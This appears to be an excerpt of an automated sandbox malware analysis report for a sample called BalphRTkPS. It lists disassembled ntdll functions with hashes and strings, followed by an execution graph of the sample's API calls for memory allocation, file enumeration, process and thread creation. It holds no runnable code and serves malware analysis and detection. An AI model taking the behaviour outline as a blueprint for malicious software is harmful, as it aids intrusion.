                                                                                                              • Instruction Fuzzy Hash: A990023124640142964072585844A4ED10697E1312BD5D425A0015568CC9148A615323
                                                                                                              Function 01772C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: 3359e3763cde15d4dfcf781cfa0b1add1cbe46feebc32dc6a0fa385504687a48
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 01772890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                                                                                                              • Instruction ID: c36ed54a1c50f272d8ce9102c9b1608a40863b64ae524cfb324e400637d69a8b
                                                                                                              • Opcode Fuzzy Hash: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                                                                                                              • Instruction Fuzzy Hash: 2651E8B5A00116BFDF11DB9C889097EFBB8BB48240B548269F5A5E7646D334DE40CBA0
                                                                                                              Function 017E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                                                                                                              • Instruction ID: 5698160bf4b54df8080d47a94eb3d93264229ccc79995da84207c64c8e45ff63
                                                                                                              • Opcode Fuzzy Hash: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                                                                                                              • Instruction Fuzzy Hash: F451F7B1A00645AECB30DF5CC99497FFBFCEB4C200B1484A9E596D7643EAB4EE408760
                                                                                                              Function 01767630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • ExecuteOptions, xrefs: 017A46A0
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A4742
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4787
                                                                                                              • Execute=1, xrefs: 017A4713
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4655
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A46FC
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4725
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                                                                                                              • Instruction ID: e0e2a32de2b374f20e02bd3302117b326bee40e747b4f1d5f6bc2b85d6eca8f6
                                                                                                              • Opcode Fuzzy Hash: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                                                                                                              • Instruction Fuzzy Hash: B3513B71600219BAEF25AAA8DC99FEDF7BCEF14348F4401E9DA05AB181E7719E418F50
                                                                                                              Function 0177B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: 1bb7149d1a0cb93d38ecdca879809e52650bba104c9df50c27eafb636c1206a1
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: 6A81F370E452498EEF25CF6CC8907FEFBB1AF85320F18465AE961E7295C7309840CB91
                                                                                                              Function 0175F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017A02E7
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017A02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 017A031E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                                                                                                              • Instruction ID: d41e43376ba3f03d8b9d101faf7e22051bc0e2757e27c2e4c0f805d852c8fb15
                                                                                                              • Opcode Fuzzy Hash: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                                                                                                              • Instruction Fuzzy Hash: 99E1BC306087419FD765CF28C884B6AFBE0FB88314F540A6DF9A58B2E1D7B4E944CB52
                                                                                                              Function 0176BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 017A7B8E
                                                                                                              • RTL: Re-Waiting, xrefs: 017A7BAC
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017A7B7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                                                                                                              • Instruction ID: 57f9efc374f229f1e96087e10a56573ce7fcd30ea34db358e54a8b17c989daed
                                                                                                              • Opcode Fuzzy Hash: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                                                                                                              • Instruction Fuzzy Hash: 8341E3713047029FD725DE29CC40BAAF7E9EF99710F100A2DF956DB690DB32E9058B91
                                                                                                              Function 0176B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 017A72A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017A7294
                                                                                                              • RTL: Re-Waiting, xrefs: 017A72C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                                                                                                              • Instruction ID: e5c7221d74435754e70b1f76a828d022c359c70bfa21036d32797fb35a05964b
                                                                                                              • Opcode Fuzzy Hash: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                                                                                                              • Instruction Fuzzy Hash: 4F41F031704202ABD725DE29CC41BAAFBB9FB95710F100629FD55EB280DB21F84287D1
                                                                                                              Function 017E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                                                                                                              • Instruction ID: 60fd25e2c63f144399f9c4e662fcd30ee5bd82674714fdd0ac39bacda7b49c3e
                                                                                                              • Opcode Fuzzy Hash: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                                                                                                              • Instruction Fuzzy Hash: 22315472A00219AFDB20DE2DCC44BEEF7FCEB58610F54455AE949E3245EB309A458FA0
                                                                                                              Function 01777D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction ID: 50e45cf47cb30262fda08364a591631b75d38129fd0e80e2deaa660339a2b138
                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                              • Instruction Fuzzy Hash: 8491E371E002069BEF28CF6DC989ABEFBA5EF44320F54491AE955E72C4E7708981C751
                                                                                                              Function 01739126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                                                                                                              • Instruction ID: bd230fedec3294854c65c95dbba2adf87ef4f038640cb517fe25e002e0fe0675
                                                                                                              • Opcode Fuzzy Hash: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                                                                                                              • Instruction Fuzzy Hash: 22811B72D002699BDB31DF54CC45BEEB7B4AB48714F1041DAEA19B7681E7709E84CFA0
                                                                                                              Function 017BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 017BCFBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8
                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                              • API String ID: 4062629308-3101775584
                                                                                                              • Opcode ID: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                                                                                                              • Instruction ID: a73438d799a6a6f38e4de533d7fa01d359e0956f42c025574647c7f3f57b4cad
                                                                                                              • Opcode Fuzzy Hash: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                                                                                                              • Instruction Fuzzy Hash: 0441D071A00225DFCB329FA9C884AADFBB8FF59704F10416AEA14DB258D734D941CB61

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.8%
                                                                                                              Dynamic/Decrypted Code Coverage:4.1%
                                                                                                              Signature Coverage:2.2%
                                                                                                              Total number of Nodes:462
                                                                                                              Total number of Limit Nodes:76
                                                                                                              execution_graph 90485 2d7bbd0 90488 2d9bac0 90485->90488 90487 2d7d241 90491 2d99c50 90488->90491 90490 2d9baee 90490->90487 90492 2d99c7b 90491->90492 90493 2d99cdf 90491->90493 90492->90490 90494 2d99cf5 NtAllocateVirtualMemory 90493->90494 90494->90490 90495 2d8cc50 90496 2d8cc79 90495->90496 90497 2d8cd7d 90496->90497 90498 2d8cd23 FindFirstFileW 90496->90498 90498->90497 90500 2d8cd3e 90498->90500 90499 2d8cd64 FindNextFileW 90499->90500 90501 2d8cd76 FindClose 90499->90501 90500->90499 90501->90497 90713 2d82910 90714 2d82936 90713->90714 90715 2d99160 LdrInitializeThunk 90714->90715 90716 2d82946 90715->90716 90719 2d99b90 90716->90719 90718 2d8295b 90720 2d99c19 90719->90720 90722 2d99bbb 90719->90722 90724 4ec2e80 LdrInitializeThunk 90720->90724 90721 2d99c4a 90721->90718 90722->90718 90724->90721 90502 2d966d0 90503 2d9672a 90502->90503 90505 2d96737 90503->90505 90506 2d940e0 90503->90506 90507 2d9bac0 NtAllocateVirtualMemory 90506->90507 90508 2d9411e 90507->90508 90511 2d9422e 90508->90511 90513 2d84bd0 90508->90513 90510 2d941b0 Sleep 90512 2d94164 90510->90512 90511->90505 90512->90510 90512->90511 90514 2d84bf4 90513->90514 90515 2d84c30 LdrLoadDll 90514->90515 90516 2d84bfb 90514->90516 90515->90516 90516->90512 90725 2d99810 90726 2d9983f 90725->90726 90727 2d998c1 90725->90727 90728 2d998d7 NtCreateFile 90727->90728 90729 2d98f90 90730 2d9901c 90729->90730 90732 2d98fbe 90729->90732 90734 4ec2ee0 LdrInitializeThunk 90730->90734 90731 2d9904d 90734->90731 90735 2d99110 90736 2d9912d 90735->90736 90739 4ec2df0 LdrInitializeThunk 90736->90739 90737 2d99155 90739->90737 90745 2d8148b 90746 2d8149f 90745->90746 90747 2d81493 PostThreadMessageW 90745->90747 90747->90746 90748 2d79f00 90749 2d79f0f 90748->90749 90750 2d79f50 90749->90750 90751 2d79f3d CreateThread 90749->90751 90752 2d87400 90753 2d8742a 90752->90753 90756 2d88590 90753->90756 90755 2d8744e 90757 2d885ad 90756->90757 90763 2d99250 90757->90763 90759 2d885fd 90760 2d88604 90759->90760 90768 2d99330 90759->90768 90760->90755 90762 2d8862d 90762->90755 90764 2d992e5 90763->90764 90765 2d9927b 90763->90765 90773 4ec2f30 LdrInitializeThunk 90764->90773 90765->90759 90766 2d9931e 90766->90759 90769 2d993da 90768->90769 90770 2d9935e 90768->90770 90774 4ec2d10 LdrInitializeThunk 90769->90774 90770->90762 90771 2d9941f 90771->90762 90773->90766 90774->90771 90775 2d87980 90776 2d879ef 90775->90776 90777 2d87995 90775->90777 90777->90776 90779 2d8b8e0 90777->90779 90781 2d8b906 90779->90781 90780 2d8bb36 90780->90776 90781->90780 90806 2d99ee0 90781->90806 90783 2d8b97c 90783->90780 90784 2d9cd10 2 API calls 90783->90784 90785 2d8b99b 90784->90785 90785->90780 90786 2d8ba6f 90785->90786 90787 2d99160 LdrInitializeThunk 90785->90787 90788 2d861a0 LdrInitializeThunk 90786->90788 90790 2d8ba8e 90786->90790 90789 2d8b9fa 90787->90789 90788->90790 90789->90786 90794 2d8ba03 90789->90794 90795 2d8bb1e 90790->90795 90812 2d98cd0 90790->90812 90791 2d8ba57 90792 2d88760 LdrInitializeThunk 90791->90792 90797 2d8ba65 90792->90797 90793 2d8ba35 90827 2d94de0 LdrInitializeThunk 90793->90827 90794->90780 90794->90791 90794->90793 90809 2d861a0 90794->90809 90798 2d88760 LdrInitializeThunk 90795->90798 90797->90776 90802 2d8bb2c 90798->90802 90801 2d8baf5 90817 2d98d80 90801->90817 90802->90776 90804 2d8bb0f 90822 2d98ee0 90804->90822 90807 2d99efd 90806->90807 90808 2d99f0e CreateProcessInternalW 90807->90808 90808->90783 90810 2d99330 LdrInitializeThunk 90809->90810 90811 2d861de 90810->90811 90811->90793 90813 2d98d4a 90812->90813 90814 2d98cfe 90812->90814 90828 4ec39b0 LdrInitializeThunk 90813->90828 90814->90801 90815 2d98d6f 90815->90801 90818 2d98dfa 90817->90818 90820 2d98dae 90817->90820 90829 4ec4340 LdrInitializeThunk 90818->90829 90819 2d98e1f 90819->90804 90820->90804 90823 2d98f57 90822->90823 90824 2d98f0b 90822->90824 90830 4ec2fb0 LdrInitializeThunk 90823->90830 90824->90795 90825 2d98f7c 90825->90795 90827->90791 90828->90815 90829->90819 90830->90825 90519 2d9cc40 90522 2d9bb40 90519->90522 90525 2d99e50 90522->90525 90524 2d9bb59 90526 2d99e6a 90525->90526 90527 2d99e7b RtlFreeHeap 90526->90527 90527->90524 90831 2d92180 90835 2d92199 90831->90835 90832 2d921e1 90833 2d9bb40 RtlFreeHeap 90832->90833 90834 2d921ee 90833->90834 90835->90832 90836 2d92221 90835->90836 90838 2d92226 90835->90838 90837 2d9bb40 RtlFreeHeap 90836->90837 90837->90838 90839 2d88e84 90840 2d88e94 90839->90840 90842 2d88e41 90840->90842 90843 2d87720 90840->90843 90844 2d87736 90843->90844 90846 2d8776f 90843->90846 90844->90846 90847 2d87590 LdrLoadDll 90844->90847 90846->90842 90847->90846 90529 2d8a27a 90530 2d8a27d 90529->90530 90531 2d9bb40 RtlFreeHeap 90530->90531 90532 2d8a290 90530->90532 90531->90532 90848 2d8feb0 90849 2d8ff14 90848->90849 90850 2d86930 2 API calls 90849->90850 90852 2d90047 90850->90852 90851 2d9004e 90852->90851 90877 2d86a40 90852->90877 90854 2d901f3 90855 2d900ca 90855->90854 90856 2d90202 90855->90856 90881 2d8fc90 90855->90881 90857 2d99b00 NtClose 90856->90857 90859 2d9020c 90857->90859 90860 2d90106 90860->90856 90861 2d90111 90860->90861 90862 2d9bc20 RtlAllocateHeap 90861->90862 90863 2d9013a 90862->90863 90864 2d90159 90863->90864 90865 2d90143 90863->90865 90890 2d8fb80 CoInitialize 90864->90890 90866 2d99b00 NtClose 90865->90866 90868 2d9014d 90866->90868 90869 2d90167 90893 2d995e0 90869->90893 90871 2d901e2 90872 2d99b00 NtClose 90871->90872 90873 2d901ec 90872->90873 90874 2d9bb40 RtlFreeHeap 90873->90874 90874->90854 90875 2d90185 90875->90871 90876 2d995e0 LdrInitializeThunk 90875->90876 90876->90875 90878 2d86a65 90877->90878 90897 2d99480 90878->90897 90882 2d8fcac 90881->90882 90883 2d84bd0 LdrLoadDll 90882->90883 90885 2d8fcca 90883->90885 90884 2d8fcd3 90884->90860 90885->90884 90886 2d84bd0 LdrLoadDll 90885->90886 90887 2d8fd9e 90886->90887 90888 2d84bd0 LdrLoadDll 90887->90888 90889 2d8fdf8 90887->90889 90888->90889 90889->90860 90892 2d8fbe5 90890->90892 90891 2d8fc7b CoUninitialize 90891->90869 90892->90891 90894 2d995fa 90893->90894 90902 4ec2ba0 LdrInitializeThunk 90894->90902 90895 2d9962a 90895->90875 90898 2d9949a 90897->90898 90901 4ec2c60 LdrInitializeThunk 90898->90901 90899 2d86ad9 90899->90855 90901->90899 90902->90895 90903 2d8b3b0 90908 2d8b0c0 90903->90908 90905 2d8b3bd 90924 2d8ad40 90905->90924 90907 2d8b3d9 90909 2d8b0e5 90908->90909 90936 2d889d0 90909->90936 90912 2d8b233 90912->90905 90914 2d8b24a 90914->90905 90916 2d8b241 90916->90914 90919 2d8b337 90916->90919 90955 2d954b0 90916->90955 90960 2d8a790 90916->90960 90918 2d954b0 GetFileAttributesW 90918->90919 90919->90918 90920 2d8b39a 90919->90920 90969 2d8ab00 90919->90969 90922 2d9bb40 RtlFreeHeap 90920->90922 90923 2d8b3a1 90922->90923 90923->90905 90925 2d8ad53 90924->90925 90933 2d8ad5e 90924->90933 90926 2d9bc20 RtlAllocateHeap 90925->90926 90926->90933 90927 2d8ad7c 90927->90907 90928 2d889d0 GetFileAttributesW 90928->90933 90929 2d8b092 90930 2d8b0a8 90929->90930 90931 2d9bb40 RtlFreeHeap 90929->90931 90930->90907 90931->90930 90932 2d954b0 GetFileAttributesW 90932->90933 90933->90927 90933->90928 90933->90929 90933->90932 90934 2d8a790 RtlFreeHeap 90933->90934 90935 2d8ab00 RtlFreeHeap 90933->90935 90934->90933 90935->90933 90937 2d889eb 90936->90937 90938 2d889f8 GetFileAttributesW 90937->90938 90939 2d88a03 90937->90939 90938->90939 90939->90912 90940 2d939d0 90939->90940 90941 2d939de 90940->90941 90942 2d939e5 90940->90942 90941->90916 90943 2d84bd0 LdrLoadDll 90942->90943 90944 2d93a1a 90943->90944 90945 2d93a29 90944->90945 90973 2d93490 LdrLoadDll 90944->90973 90947 2d9bc20 RtlAllocateHeap 90945->90947 90951 2d93bd4 90945->90951 90948 2d93a42 90947->90948 90949 2d93bca 90948->90949 90948->90951 90952 2d93a5e 90948->90952 90950 2d9bb40 RtlFreeHeap 90949->90950 90949->90951 90950->90951 90951->90916 90952->90951 90953 2d9bb40 RtlFreeHeap 90952->90953 90954 2d93bbe 90953->90954 90954->90916 90957 2d95514 90955->90957 90956 2d9554b 90956->90916 90957->90956 90974 2d88a20 90957->90974 90959 2d9552d 90959->90916 90961 2d8a7b6 90960->90961 90978 2d8e1c0 90961->90978 90963 2d8a828 90965 2d8a9b0 90963->90965 90966 2d8a846 90963->90966 90964 2d8a995 90964->90916 90965->90964 90967 2d8a650 RtlFreeHeap 90965->90967 90966->90964 90983 2d8a650 90966->90983 90967->90965 90970 2d8ab26 90969->90970 90971 2d8e1c0 RtlFreeHeap 90970->90971 90972 2d8abad 90971->90972 90972->90919 90973->90945 90975 2d889eb 90974->90975 90976 2d889f8 GetFileAttributesW 90975->90976 90977 2d88a03 90975->90977 90976->90977 90977->90959 90980 2d8e1e4 90978->90980 90979 2d8e1f1 90979->90963 90980->90979 90981 2d9bb40 RtlFreeHeap 90980->90981 90982 2d8e234 90981->90982 90982->90963 90984 2d8a66d 90983->90984 90987 2d8e250 90984->90987 90986 2d8a773 90986->90966 90988 2d8e274 90987->90988 90989 2d8e31e 90988->90989 90990 2d9bb40 RtlFreeHeap 90988->90990 90989->90986 90990->90989 90533 2d91df0 90534 2d91e0c 90533->90534 90535 2d91e48 90534->90535 90536 2d91e34 90534->90536 90543 2d99b00 90535->90543 90537 2d99b00 NtClose 90536->90537 90539 2d91e3d 90537->90539 90540 2d91e51 90546 2d9bc60 RtlAllocateHeap 90540->90546 90542 2d91e5c 90544 2d99b1a 90543->90544 90545 2d99b2b NtClose 90544->90545 90545->90540 90546->90542 90547 2d99970 90548 2d99a14 90547->90548 90550 2d9999e 90547->90550 90549 2d99a2a NtReadFile 90548->90549 91001 2d907b0 91002 2d907cd 91001->91002 91003 2d84bd0 LdrLoadDll 91002->91003 91004 2d907eb 91003->91004 90551 2d83773 90556 2d883e0 90551->90556 90554 2d8379f 90555 2d99b00 NtClose 90555->90554 90557 2d883fa 90556->90557 90561 2d83783 90556->90561 90562 2d99200 90557->90562 90560 2d99b00 NtClose 90560->90561 90561->90554 90561->90555 90563 2d9921a 90562->90563 90566 4ec35c0 LdrInitializeThunk 90563->90566 90564 2d884ca 90564->90560 90566->90564 90567 2d82de8 90568 2d82e08 90567->90568 90571 2d86930 90568->90571 90570 2d82e13 90572 2d86963 90571->90572 90573 2d86984 90572->90573 90578 2d99680 90572->90578 90573->90570 90575 2d869a7 90575->90573 90576 2d99b00 NtClose 90575->90576 90577 2d86a29 90576->90577 90577->90570 90579 2d9969a 90578->90579 90582 4ec2ca0 LdrInitializeThunk 90579->90582 90580 2d996c6 90580->90575 90582->90580 90583 2d79f60 90585 2d7a288 90583->90585 90586 2d7a769 90585->90586 90587 2d9b7b0 90585->90587 90588 2d9b7d6 90587->90588 90593 2d741a0 90588->90593 90590 2d9b7e2 90592 2d9b81b 90590->90592 90596 2d95c60 90590->90596 90592->90586 90595 2d741ad 90593->90595 90600 2d83880 90593->90600 90595->90590 90597 2d95cc2 90596->90597 90599 2d95ccf 90597->90599 90618 2d82060 90597->90618 90599->90592 90601 2d8389a 90600->90601 90603 2d838b3 90601->90603 90604 2d9a520 90601->90604 90603->90595 90606 2d9a53a 90604->90606 90605 2d9a569 90605->90603 90606->90605 90611 2d99160 90606->90611 90609 2d9bb40 RtlFreeHeap 90610 2d9a5d9 90609->90610 90610->90603 90612 2d9917a 90611->90612 90615 4ec2c0a 90612->90615 90613 2d991a6 90613->90609 90616 4ec2c1f LdrInitializeThunk 90615->90616 90617 4ec2c11 90615->90617 90616->90613 90617->90613 90619 2d8209b 90618->90619 90634 2d884f0 90619->90634 90621 2d820a3 90622 2d82380 90621->90622 90645 2d9bc20 90621->90645 90622->90599 90624 2d820b9 90625 2d9bc20 RtlAllocateHeap 90624->90625 90626 2d820ca 90625->90626 90627 2d9bc20 RtlAllocateHeap 90626->90627 90628 2d820db 90627->90628 90633 2d82178 90628->90633 90652 2d87090 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 90628->90652 90630 2d84bd0 LdrLoadDll 90631 2d82332 90630->90631 90648 2d985a0 90631->90648 90633->90630 90635 2d8851c 90634->90635 90636 2d883e0 2 API calls 90635->90636 90637 2d8853f 90636->90637 90638 2d88549 90637->90638 90639 2d88561 90637->90639 90641 2d88554 90638->90641 90642 2d99b00 NtClose 90638->90642 90640 2d8857d 90639->90640 90643 2d99b00 NtClose 90639->90643 90640->90621 90641->90621 90642->90641 90644 2d88573 90643->90644 90644->90621 90653 2d99e00 90645->90653 90647 2d9bc3b 90647->90624 90649 2d98602 90648->90649 90651 2d9860f 90649->90651 90656 2d82390 90649->90656 90651->90622 90652->90633 90654 2d99e1a 90653->90654 90655 2d99e2b RtlAllocateHeap 90654->90655 90655->90647 90672 2d887c0 90656->90672 90658 2d828f3 90658->90651 